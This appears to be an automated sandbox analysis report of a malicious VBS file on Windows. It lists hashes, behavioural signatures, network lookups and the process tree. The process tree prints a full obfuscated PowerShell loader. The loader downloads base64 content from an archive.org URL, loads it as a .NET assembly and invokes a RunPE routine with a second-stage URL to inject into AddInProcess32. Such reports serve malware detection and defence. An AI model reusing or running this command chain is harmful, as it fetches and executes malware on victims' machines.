Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/10/2024, 01:35 UTC
Static task
static1
Behavioral task
behavioral1
Sample
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs
Resource
win10v2004-20240802-en
General
-
Target
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs
-
Size
504KB
-
MD5
73116ddf40456b41c6b35023bc02e781
-
SHA1
037b869900d0474bf7603b8fbe3401f517f52117
-
SHA256
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a
-
SHA512
f60cbe6234371aacd3f42f87db8ea04cc3b982d9c356db5a1e0fa3959268c0aa8e78e4c059feac1619348a3453e55c3386e096812d2a4a6d61aca5cc99007be3
-
SSDEEP
12288:VS57Wp1MYi6qsGrA2OGLmeq0wM/l1d0FUvoExHRbb4XJb7q5cPT+EmJu6X:VC6X0T5VnpJ4Za
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 536 powershell.exe 6 536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3068 powershell.exe 536 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3068 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 536 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2108 wrote to memory of 3068 2108 WScript.exe 30 PID 2108 wrote to memory of 3068 2108 WScript.exe 30 PID 2108 wrote to memory of 3068 2108 WScript.exe 30 PID 3068 wrote to memory of 536 3068 powershell.exe 32 PID 3068 wrote to memory of 536 3068 powershell.exe 32 PID 3068 wrote to memory of 536 3068 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsICcrJz0gJysneycrJzB9JysnaHR0cHMnKyc6Ly9pYTYnKycwMCcrJzEwMCcrJy51cy5hJysncmNoaXYnKydlLm9yZycrJy8yNC9pJysndGUnKydtcy9kZXRhaC0nKydubycrJ3RlLScrJ3YvRGV0YWhOb3RlJysnVicrJy50JysneCcrJ3R7MH07ezF9YmFzZScrJzYnKyc0Q29udGVuJysndCA9JysnIChOZScrJ3ctJysnT2InKydqJysnZScrJ2N0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQ2xpZW50KS5Eb3dubG9hZFN0cmluZyh7MScrJ311cmwpO3sxJysnfScrJ2InKydpbicrJ2FyeScrJ0NvbnRlbnQgPScrJyBbU3lzdCcrJ2UnKydtJysnLkNvbnZlcnRdJysnOjonKydGcm9tQicrJ2FzZTY0JysnU3QnKydyaW5nKCcrJ3sxJysnfWJhJysnc2U2NENvbicrJ3RlJysnbnQpOycrJ3sxJysnfWFzc2UnKydtYmx5ID0gW1JlZmxlY3QnKydpbycrJ24nKycuQScrJ3NzZW1ibHknKyddJysnOjpMb2FkKHsxfWJpbmFyeScrJ0MnKydvJysnbicrJ3QnKydlJysnbnQpO3sxfXR5JysncGUnKycgPScrJyB7MX1hJysnc3MnKydlJysnbWJseS5HJysnZXRUeXBlJysnKHswfVJ1blBFLicrJ0hvbWV7MH0pOycrJ3sxJysnfScrJ20nKydldGhvZCA9JysnIHsxfXR5cGUuRycrJ2V0JysnTWUnKyd0JysnaG9kKCcrJ3swfVZBSXsnKycwfScrJyk7ezF9bWV0aG9kLicrJ0ludicrJ29rJysnZSh7JysnMScrJ31udScrJ2xsLCBbbycrJ2JqZWMnKyd0JysnWycrJ11dJysnQCh7MH10eCcrJ3QueHR5bS92ZWQuJysnMicrJ3IuMzliMzQnKyc1MzAnKycyYScrJzA3JysnNWIxYmMwZDQnKyc1YjYzMmViOWVlNjInKyctYicrJ3UnKydwJysnLy86cycrJ3B0dCcrJ2h7MCcrJ30gLCcrJyAnKyd7MCcrJ31kZXNhdGl2YWRvezB9ICcrJywgezB9ZGVzYXQnKydpdmEnKydkb3snKycwJysnfScrJyAsIHswfWQnKydlc2F0JysnaScrJ3ZhJysnZG97MH0sezB9QScrJ2RkSScrJ25Qcm9jZScrJ3NzMycrJzJ7MH0sJysnezAnKyd9JysnezAnKyd9KScrJyknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzYpIHwgLiAoKEdWICcqbWRSKicpLm5hbWVbMywxMSwyXS1Kb2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url '+'= '+'{'+'0}'+'https'+'://ia6'+'00'+'100'+'.us.a'+'rchiv'+'e.org'+'/24/i'+'te'+'ms/detah-'+'no'+'te-'+'v/DetahNote'+'V'+'.t'+'x'+'t{0};{1}base'+'6'+'4Conten'+'t ='+' (Ne'+'w-'+'Ob'+'j'+'e'+'ct System.N'+'e'+'t'+'.Web'+'Client).DownloadString({1'+'}url);{1'+'}'+'b'+'in'+'ary'+'Content ='+' [Syst'+'e'+'m'+'.Convert]'+'::'+'FromB'+'ase64'+'St'+'ring('+'{1'+'}ba'+'se64Con'+'te'+'nt);'+'{1'+'}asse'+'mbly = [Reflect'+'io'+'n'+'.A'+'ssembly'+']'+'::Load({1}binary'+'C'+'o'+'n'+'t'+'e'+'nt);{1}ty'+'pe'+' ='+' {1}a'+'ss'+'e'+'mbly.G'+'etType'+'({0}RunPE.'+'Home{0});'+'{1'+'}'+'m'+'ethod ='+' {1}type.G'+'et'+'Me'+'t'+'hod('+'{0}VAI{'+'0}'+');{1}method.'+'Inv'+'ok'+'e({'+'1'+'}nu'+'ll, [o'+'bjec'+'t'+'['+']]'+'@({0}tx'+'t.xtym/ved.'+'2'+'r.39b34'+'530'+'2a'+'07'+'5b1bc0d4'+'5b632eb9ee62'+'-b'+'u'+'p'+'//:s'+'ptt'+'h{0'+'} ,'+' '+'{0'+'}desativado{0} '+', {0}desat'+'iva'+'do{'+'0'+'}'+' , {0}d'+'esat'+'i'+'va'+'do{0},{0}A'+'ddI'+'nProce'+'ss3'+'2{0},'+'{0'+'}'+'{0'+'})'+')') -F [cHar]39,[cHar]36) | . ((GV '*mdR*').name[3,11,2]-Join'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
Network
-
Remote address:8.8.8.8:53Requestia600100.us.archive.orgIN AResponseia600100.us.archive.orgIN A207.241.227.240
-
357 B 219 B 5 5
-
449 B 259 B 7 6
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UFYWR635IES33XBQGEZW.temp
Filesize7KB
MD548edfe5248b4000c2b16546372f67f45
SHA1590e9fedf0c5ae68334123ac2a8d95c83ba877df
SHA25604a11776d3d467907b48b797eb680272181bdf7c589942c86a663a95b630383b
SHA5121f2fd91cc70a474095f3f0708572c2de487ac2312965b71a9e50b8e26834c9cc87e2beb764d7cfdab0e541df32a97c10940bcb03f22a2baeb1e00aba60098967